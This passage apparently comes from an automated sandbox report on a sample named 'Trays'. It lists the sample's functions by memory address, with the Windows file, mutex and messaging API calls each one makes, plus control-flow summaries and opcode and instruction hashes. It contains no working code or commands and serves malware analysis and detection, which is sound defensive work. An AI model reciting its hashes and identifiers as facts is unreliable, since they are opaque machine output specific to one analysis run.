                                                                                                                                                                    • Opcode Fuzzy Hash: 67a990705689ec06b45837d582591c9401892ae420851c88646fc597345079f1
                                                                                                                                                                    • Instruction Fuzzy Hash: BEE0ED71D08208EFDB40DBE9D94298D77F8AF14254B2000AAE404F7281EA34EA409759
                                                                                                                                                                    Function 0040DA56 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 114 40da56-40da80 ReadFile 116 40da82 114->116 117 40da89-40da8f 114->117 116->117
                                                                                                                                                                    APIs
                                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040DA79
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460540022.000000000040D000.00000040.00000001.01000000.00000008.sdmp, Offset: 0040D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_40d000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                    • Opcode ID: 4cb18adebd8b4bb3d27d974246fbb8fc76eac4d28102e090c80fcd7e1b8092d3
                                                                                                                                                                    • Instruction ID: 14e5a3da8a9dfb6c079094981f07d5d843ccd5414590da8d0f86c954d81fc627
                                                                                                                                                                    • Opcode Fuzzy Hash: 4cb18adebd8b4bb3d27d974246fbb8fc76eac4d28102e090c80fcd7e1b8092d3
                                                                                                                                                                    • Instruction Fuzzy Hash: 43E059B5E04209ABDB50DEDDDC41AAEB7FCAB08314F1046A5B928E7380E7349A008B95
                                                                                                                                                                    Function 0040DAF4 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 118 40daf4-40db2d SetFilePointer
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,?), ref: 0040DB1C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460540022.000000000040D000.00000040.00000001.01000000.00000008.sdmp, Offset: 0040D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_40d000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                    • Opcode ID: 24088a72eb5c611e2227de5dc89cc3fe86a0ac7f25fccd3eb8ff43237ca904a8
                                                                                                                                                                    • Instruction ID: 39e6efff3915d474b9535c51db54f27ff0a268f22563f21b6ddfbfd9e9340c5b
                                                                                                                                                                    • Opcode Fuzzy Hash: 24088a72eb5c611e2227de5dc89cc3fe86a0ac7f25fccd3eb8ff43237ca904a8
                                                                                                                                                                    • Instruction Fuzzy Hash: 56F022B5D0020CEF8B40DFD9C8819DEBBF8AB08210F1086A6A958E7340E630AB509B91
                                                                                                                                                                    Function 0040DA58 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 126 40da58-40da80 ReadFile 127 40da82 126->127 128 40da89-40da8f 126->128 127->128
                                                                                                                                                                    APIs
                                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040DA79
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460540022.000000000040D000.00000040.00000001.01000000.00000008.sdmp, Offset: 0040D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_40d000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                    • Opcode ID: 2db0a698213bfec23cbbe390486a5163c5c4d083a53de4127c7ecf0557c261f4
                                                                                                                                                                    • Instruction ID: 3892127834060a40671734689fb52ea75faab406bcf4ac04240d8793c45448c5
                                                                                                                                                                    • Opcode Fuzzy Hash: 2db0a698213bfec23cbbe390486a5163c5c4d083a53de4127c7ecf0557c261f4
                                                                                                                                                                    • Instruction Fuzzy Hash: CBE07DB5D0420DABCB50DFDDDC41AAEB7FCAB08314F1046A5B928E7380E7349A008B95
                                                                                                                                                                    Function 0040DA90 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 129 40da90-40dab8 WriteFile 130 40dac1-40dac7 129->130 131 40daba 129->131 131->130
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040DAB1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460540022.000000000040D000.00000040.00000001.01000000.00000008.sdmp, Offset: 0040D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_40d000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                    • Opcode ID: 8dddac056278adecd1a6735c940ddd0e7f6a512f96ea4a112e83323effdbc07e
                                                                                                                                                                    • Instruction ID: 5126c2a708bd691ab6fdcffe25b82d915e589c805d7f57d25c5be6d2a02174d1
                                                                                                                                                                    • Opcode Fuzzy Hash: 8dddac056278adecd1a6735c940ddd0e7f6a512f96ea4a112e83323effdbc07e
                                                                                                                                                                    • Instruction Fuzzy Hash: 73E07DB5E0420DAFCB50DFDDCC41AAEB7FCAB08324F1046A5B928E7381E7349A008B55
                                                                                                                                                                    Function 0040DBD4 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 132 40dbd4-40dbf2 GetFileAttributesA 134 40dbf4-40dbf8 132->134 135 40dbfa-40dbfc 132->135 134->135 136 40dbfe 134->136 137 40dc00-40dc09 135->137 136->137
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 0040DBE6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460540022.000000000040D000.00000040.00000001.01000000.00000008.sdmp, Offset: 0040D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_40d000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                    • Opcode ID: ce680b3872d523c84dabd92bb191e72fa89904296643bc56b9bd93f715a18f74
                                                                                                                                                                    • Instruction ID: 873655738806c07907e1716ce04be425cbd9c59a8a1fec5998c7cfb8dfba1798
                                                                                                                                                                    • Opcode Fuzzy Hash: ce680b3872d523c84dabd92bb191e72fa89904296643bc56b9bd93f715a18f74
                                                                                                                                                                    • Instruction Fuzzy Hash: B8E04830C0824CA9CF10DAF948055DEBBB48B15324F1586F6DC74773D1D6795B05AF56
                                                                                                                                                                    Function 0040DA04 Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 138 40da04-40da36 CreateFileA
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileA.KERNEL32(00000000), ref: 0040DA28
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460540022.000000000040D000.00000040.00000001.01000000.00000008.sdmp, Offset: 0040D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_40d000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                    • Opcode ID: 7900602fef25317ffc8de1b1160873a4fb757b518a0ad8a9b7ff6ef27e7162e7
                                                                                                                                                                    • Instruction ID: be3d8b90435f1080e2030f4b463b409b57e26f0f337c737d612ca40f36be3a7e
                                                                                                                                                                    • Opcode Fuzzy Hash: 7900602fef25317ffc8de1b1160873a4fb757b518a0ad8a9b7ff6ef27e7162e7
                                                                                                                                                                    • Instruction Fuzzy Hash: 04E01230E44308BAEB2096A49C47F8D77A4D701B24F604166B214BB2C1EA757A00474D
                                                                                                                                                                    Function 0040DAC8 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,00000000,?), ref: 0040DAE5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460540022.000000000040D000.00000040.00000001.01000000.00000008.sdmp, Offset: 0040D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_40d000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                    • Opcode ID: 47c1f21d09578717b0fcfd5cadf21cb3ea347b191d8e0f87371f34406ae2bb38
                                                                                                                                                                    • Instruction ID: 09f6df2d8612600ed8b0da20115de407fba9ba8276b170be78955fea16b3dbfe
                                                                                                                                                                    • Opcode Fuzzy Hash: 47c1f21d09578717b0fcfd5cadf21cb3ea347b191d8e0f87371f34406ae2bb38
                                                                                                                                                                    • Instruction Fuzzy Hash: 6FE026B5D0520CAFCB50DFDDD841A9EBBF8AB08314F1046A9F928E7381E6756A108B95
                                                                                                                                                                    Function 00407B7E Relevance: 1.5, APIs: 1, Instructions: 19synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 140 407b7e-407ba4 CreateMutexA
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateMutexA.KERNEL32(?,?,?), ref: 00407B97
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460255375.0000000000407000.00000040.00000001.01000000.00000008.sdmp, Offset: 00407000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_407000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutex
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1964310414-0
                                                                                                                                                                    • Opcode ID: aac90e20a50084a577ced6f325ddde7fae3f822483f87fcda839c5e40715e318
                                                                                                                                                                    • Instruction ID: 751d3c07f1bd4ffed392ed2fa52f1ab306a2e6ed8cdcb577f708f19d6ec117e7
                                                                                                                                                                    • Opcode Fuzzy Hash: aac90e20a50084a577ced6f325ddde7fae3f822483f87fcda839c5e40715e318
                                                                                                                                                                    • Instruction Fuzzy Hash: F9D05E73A14208FFCB00DFADDC05D9E73ECEB18218B108429F418D7100D239EA009B24
                                                                                                                                                                    Function 0040E374 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000), ref: 0040E388
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460713916.000000000040E000.00000020.00000001.01000000.00000008.sdmp, Offset: 0040E000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_40e000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateDirectory
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4241100979-0
                                                                                                                                                                    • Opcode ID: 22fb2b40fd4a8a2b06b1df012c408dbb98098f3d657913b9e6ad7938e86941f1
                                                                                                                                                                    • Instruction ID: 7692d76ef111b5ee836ebe9a31fd2cade93273b66ac128e7a7857973ef40951a
                                                                                                                                                                    • Opcode Fuzzy Hash: 22fb2b40fd4a8a2b06b1df012c408dbb98098f3d657913b9e6ad7938e86941f1
                                                                                                                                                                    • Instruction Fuzzy Hash: 45D05B31C18388ADDF00A6B85803A9D77F8C701118F1001B6E454E71C1E5736700575A
                                                                                                                                                                    Function 00407B80 Relevance: 1.5, APIs: 1, Instructions: 18synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateMutexA.KERNEL32(?,?,?), ref: 00407B97
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460255375.0000000000407000.00000040.00000001.01000000.00000008.sdmp, Offset: 00407000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_407000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutex
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1964310414-0
                                                                                                                                                                    • Opcode ID: 485a42cfd74afe0bd6fd3a83a5c21534c4123a8668d01e8793639fac456bf432
                                                                                                                                                                    • Instruction ID: ba48da0fededa176f6dc3af391a092b94f439a61e1cbd7d27dbfdd19b8a8d2fb
                                                                                                                                                                    • Opcode Fuzzy Hash: 485a42cfd74afe0bd6fd3a83a5c21534c4123a8668d01e8793639fac456bf432
                                                                                                                                                                    • Instruction Fuzzy Hash: ADD05E73914208FFCB00DFA9D805D8E73ECEB18218B108429F418D7100D239EA009B24
                                                                                                                                                                    Function 0040DEB0 Relevance: 1.5, APIs: 1, Instructions: 17fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040DEC2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460540022.000000000040D000.00000040.00000001.01000000.00000008.sdmp, Offset: 0040D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_40d000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                                                    • Opcode ID: c4df117b41d9e62c09e7a2e5a8d6c0adfcdc2e4c8a6b70b230a4bb51994bb300
                                                                                                                                                                    • Instruction ID: e5738bb7791b8de898c5e1854fb0686c034a705679e1600e86553b5ad0aaf8b7
                                                                                                                                                                    • Opcode Fuzzy Hash: c4df117b41d9e62c09e7a2e5a8d6c0adfcdc2e4c8a6b70b230a4bb51994bb300
                                                                                                                                                                    • Instruction Fuzzy Hash: 43D05B31C182889DCB0096B8580348D77F8C406118B1001B7E464E21C1E5326700571A
                                                                                                                                                                    Function 00492030 Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • PostMessageA.USER32(?,00000000,00000000,00000000), ref: 00492049
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460713916.0000000000492000.00000020.00000001.01000000.00000008.sdmp, Offset: 00492000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_492000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 410705778-0
                                                                                                                                                                    • Opcode ID: 683740de0cd3d13bb211cf758aa42f942b25debe9a1cbd552a38c8d4252b203b
                                                                                                                                                                    • Instruction ID: 68d9acdafb4be76bf47316bff775b9cf17aaaf0e94ff3881b5f41db021c9233f
                                                                                                                                                                    • Opcode Fuzzy Hash: 683740de0cd3d13bb211cf758aa42f942b25debe9a1cbd552a38c8d4252b203b
                                                                                                                                                                    • Instruction Fuzzy Hash: 17D0A731D44308AFE710DA999D47F5D73EC9B00720F7001AAF514AB2C0E9727A00474C
                                                                                                                                                                    Function 004058A0 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(?,?,00000000,00405BB6), ref: 004058AB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21459930645.0000000000405000.00000020.00000001.01000000.00000008.sdmp, Offset: 00405000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_405000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocString
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2525500382-0
                                                                                                                                                                    • Opcode ID: a2cc117508db4ab2b938fbdb011b3aa8dd7d6cc0c5f525d5aa23045a41fa81a7
                                                                                                                                                                    • Instruction ID: 90204f2cb19fc3b7579f323bb29da437b89a3ee6a8e0f6ea2d74df62dbe08371
                                                                                                                                                                    • Opcode Fuzzy Hash: a2cc117508db4ab2b938fbdb011b3aa8dd7d6cc0c5f525d5aa23045a41fa81a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 49C01278101602ACFA052E214A4587B261CDE85300F44007FBC00A55E1D57CCC41B829
                                                                                                                                                                    Function 0040503E Relevance: 1.5, APIs: 1, Instructions: 4threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21459930645.0000000000405000.00000020.00000001.01000000.00000008.sdmp, Offset: 00405000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_405000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExitThreadUser
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3424019298-0
                                                                                                                                                                    • Opcode ID: 6e8d86b27b2097b407f0a02bd4581043f66e3382ee37946d2e4900d149ff9bc3
                                                                                                                                                                    • Instruction ID: 0b2d77c36f6589118b0ca0c09f3071299952812b38731f639c80d698c83ffc07
                                                                                                                                                                    • Opcode Fuzzy Hash: 6e8d86b27b2097b407f0a02bd4581043f66e3382ee37946d2e4900d149ff9bc3
                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                    Function 0040DB30 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460540022.000000000040D000.00000040.00000001.01000000.00000008.sdmp, Offset: 0040D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_40d000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                    • Opcode ID: fcd71d5b366576adf042c1e36319ad09c9f3eb5c7da91b6cb2018f7e6e5bc4bc
                                                                                                                                                                    • Instruction ID: ffc61799e0186f4fa3a489bf7ea91d87b1a53086d2ee172b3df64630a477a28d
                                                                                                                                                                    • Opcode Fuzzy Hash: fcd71d5b366576adf042c1e36319ad09c9f3eb5c7da91b6cb2018f7e6e5bc4bc
                                                                                                                                                                    • Instruction Fuzzy Hash: D3B09B71C4C30CBB8B04D7D9E501C4D77FC9504214750005AF10CD3141D5357A405669
                                                                                                                                                                    Function 004070C4 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460255375.0000000000407000.00000040.00000001.01000000.00000008.sdmp, Offset: 00407000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_407000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: bf11de5de857e82cfecb48b9085873f14fbdee92944c20be0f4ea78ea0460259
                                                                                                                                                                    • Instruction ID: 3258118cb7fe5fc0b0082802f3705eb23a3ef69d8f452aae5e35004cdf3a7df2
                                                                                                                                                                    • Opcode Fuzzy Hash: bf11de5de857e82cfecb48b9085873f14fbdee92944c20be0f4ea78ea0460259
                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0F870604102AFE7508F19D808B63B7E9EF85711B2881AAF404DB2A4EB74AC418A26
                                                                                                                                                                    Function 00414A40 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460713916.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00413000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_413000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: abb6cb85e59317d3e069581cff25ff5f9bd66edb2b8d26f9f3fd0e8ccdd6b368
                                                                                                                                                                    • Instruction ID: 118a00964a598dc712ee93eedb2704894825847e7f5cca6471979d3104990871
                                                                                                                                                                    • Opcode Fuzzy Hash: abb6cb85e59317d3e069581cff25ff5f9bd66edb2b8d26f9f3fd0e8ccdd6b368
                                                                                                                                                                    • Instruction Fuzzy Hash: 3DE0863488C3C828D701D3B6194679D7FE80B16704F4851DDE9C475382D5BB114A8B15
                                                                                                                                                                    Function 00407080 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460255375.0000000000407000.00000040.00000001.01000000.00000008.sdmp, Offset: 00407000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_407000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: e60cb4945767619aba17da86e8a85bd83280a13d8f23fd196f03e66ea3d050c3
                                                                                                                                                                    • Instruction ID: 6053b45916b4980705cc669d154bf3d9a231b22630885f878471c47fb7f6adc4
                                                                                                                                                                    • Opcode Fuzzy Hash: e60cb4945767619aba17da86e8a85bd83280a13d8f23fd196f03e66ea3d050c3
                                                                                                                                                                    • Instruction Fuzzy Hash: ADC04CB4501141DFE710CF15C844B5377B5EF85711F2985D5B504DB175DB35AC41CA24

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 00407C5E Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460255375.0000000000407000.00000040.00000001.01000000.00000008.sdmp, Offset: 00407000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_407000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d169621ef0ad744901bf18302ea611413e676e1b659aff3bc43c30e7496ff965
                                                                                                                                                                    • Instruction ID: dc3fb23227c170f4891217de1dec53545c2a03b942f325137934420725eb549b
                                                                                                                                                                    • Opcode Fuzzy Hash: d169621ef0ad744901bf18302ea611413e676e1b659aff3bc43c30e7496ff965
                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                    Function 00407D5E Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460255375.0000000000407000.00000040.00000001.01000000.00000008.sdmp, Offset: 00407000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_407000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4eb28926da90f1413f4df91209bd0cc00374f6c02aacc9a7350b048b7c8c92a9
                                                                                                                                                                    • Instruction ID: cfe384932ee36755eb9a7f7aad966542df387d042831166a89cc8d85aa6ff4db
                                                                                                                                                                    • Opcode Fuzzy Hash: 4eb28926da90f1413f4df91209bd0cc00374f6c02aacc9a7350b048b7c8c92a9
                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                    Function 00407D0E Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460255375.0000000000407000.00000040.00000001.01000000.00000008.sdmp, Offset: 00407000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_407000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 8571b2b6c9a46d354ebfe37aa0495fc22d9c8c21fc20de8096ca4f1ff89f1e31
                                                                                                                                                                    • Instruction ID: 34723043fe4ac3ea23cb71772065fd2a2289938e25966dd76471cb78fd3818fd
                                                                                                                                                                    • Opcode Fuzzy Hash: 8571b2b6c9a46d354ebfe37aa0495fc22d9c8c21fc20de8096ca4f1ff89f1e31
                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                    Function 00407B2E Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460255375.0000000000407000.00000040.00000001.01000000.00000008.sdmp, Offset: 00407000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_407000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 14443b77180213fad75cbdd17b606d300e29303de9a227fb2dd9b21041084752
                                                                                                                                                                    • Instruction ID: 1327e09510ba19ebfa2fd5d48c8203a954042976866813bd7ae889c5eb676f6c
                                                                                                                                                                    • Opcode Fuzzy Hash: 14443b77180213fad75cbdd17b606d300e29303de9a227fb2dd9b21041084752
                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                    Function 0041325C Relevance: 11.5, Strings: 9, Instructions: 204COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460713916.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00413000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_413000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy$(X$(X$(X
                                                                                                                                                                    • API String ID: 0-4584490
                                                                                                                                                                    • Opcode ID: 32115303afc680b9da84a35f2ca6292aef4b5ea059748ecf5d0d845927380b80
                                                                                                                                                                    • Instruction ID: 22edbe985a84719c9b989d53a584f74bb7e001345a36acf9cc05ef5d77d3292f
                                                                                                                                                                    • Opcode Fuzzy Hash: 32115303afc680b9da84a35f2ca6292aef4b5ea059748ecf5d0d845927380b80
                                                                                                                                                                    • Instruction Fuzzy Hash: 8B715130A00149ABDB00EBE9D841ADFBBB6EF48304F50847BF504B7695DA3CDE859B59
                                                                                                                                                                    Function 00414560 Relevance: 8.8, Strings: 7, Instructions: 80COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
